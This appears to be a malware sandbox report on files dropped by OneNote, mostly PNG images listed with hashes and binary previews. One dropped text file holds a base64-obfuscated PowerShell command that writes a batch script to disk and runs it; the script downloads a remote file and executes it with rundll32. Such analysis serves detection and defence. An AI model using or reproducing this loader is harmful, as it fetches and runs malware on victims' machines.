                                                                                                                                                    Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{99AF8CF4-D36D-4866-AA8C-05735BC1C9EB}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16003
                                                                                                                                                    Entropy (8bit):7.959532793770661
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                    MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                    SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                    SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                    SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{99CCE4A0-385E-4890-AE48-41C445FBA682}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4847
                                                                                                                                                    Entropy (8bit):7.950192613458318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                    MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                    SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                    SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                    SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9A7CE641-13D8-4994-B0CA-286F36739626}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3879
                                                                                                                                                    Entropy (8bit):7.9281351307465044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                    MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                    SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                    SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                    SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9AC8A009-2CEA-4D7D-8DF7-DE756847AFC8}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13241
                                                                                                                                                    Entropy (8bit):7.931391290415517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                    MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                    SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                    SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                    SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9AEA1C62-7B7D-404F-AFCB-FB093F02BC23}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2210
                                                                                                                                                    Entropy (8bit):7.86853667196985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                    MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                    SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                    SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                    SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9B084582-4890-4303-B7CD-E4F5D128FADB}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4081
                                                                                                                                                    Entropy (8bit):7.943373267196131
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                    MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                    SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                    SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                    SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9C341BBF-A93E-4309-B590-DACBD6D13299}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13737
                                                                                                                                                    Entropy (8bit):7.916899917415529
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                    MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                    SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                    SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                    SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9C8B0398-CE20-4CBE-B0C1-7499DD8A7DF2}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2599
                                                                                                                                                    Entropy (8bit):7.903700862190034
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                    MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                    SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                    SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                    SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9EEE4ABA-A596-4639-889F-712CD64F7BCE}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11886
                                                                                                                                                    Entropy (8bit):7.946442244439929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                    MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                    SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                    SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                    SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9F71642F-04CF-4DAE-B6F5-17AA24616C3B}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13737
                                                                                                                                                    Entropy (8bit):7.916899917415529
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                    MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                    SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                    SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                    SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{9F80252E-A71F-4B7E-AB8C-51CC2878DD32}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1657
                                                                                                                                                    Entropy (8bit):7.80882577056055
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                    MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                    SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                    SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                    SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{A0D60D5C-D7DE-4E5F-98A0-9484893279AA}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:ASCII text, with very long lines (372), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):372
                                                                                                                                                    Entropy (8bit):5.8138289883344685
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSAP/7XfkfYRRjpm+Rs3FEY9hMS/aXXrZ/I:ssLgyaI4HPKC2EwgvBS2/7Xjj4+RIFEk
                                                                                                                                                    MD5:7B496ED05993DC9E0510941660F450B1
                                                                                                                                                    SHA1:1D05D4A1D54D9DB7E0636D2462A2AD4F6136E57D
                                                                                                                                                    SHA-256:A2D81D7963DEBAB5291457FBA18E7E46D716C1271E32B5B5125441BED3D5573D
                                                                                                                                                    SHA-512:CCB894F9EAF59FA68B68DD4F66C4B38F960782075CD47E3107B600B48108F5F63B47D2E1C17A5A2763053834992D53766DAAAF6DBB32BECBD349E9FD210500C8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{A0F20B21-0D6D-480A-B950-A174DFAFEB22}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8184
                                                                                                                                                    Entropy (8bit):7.807848176906598
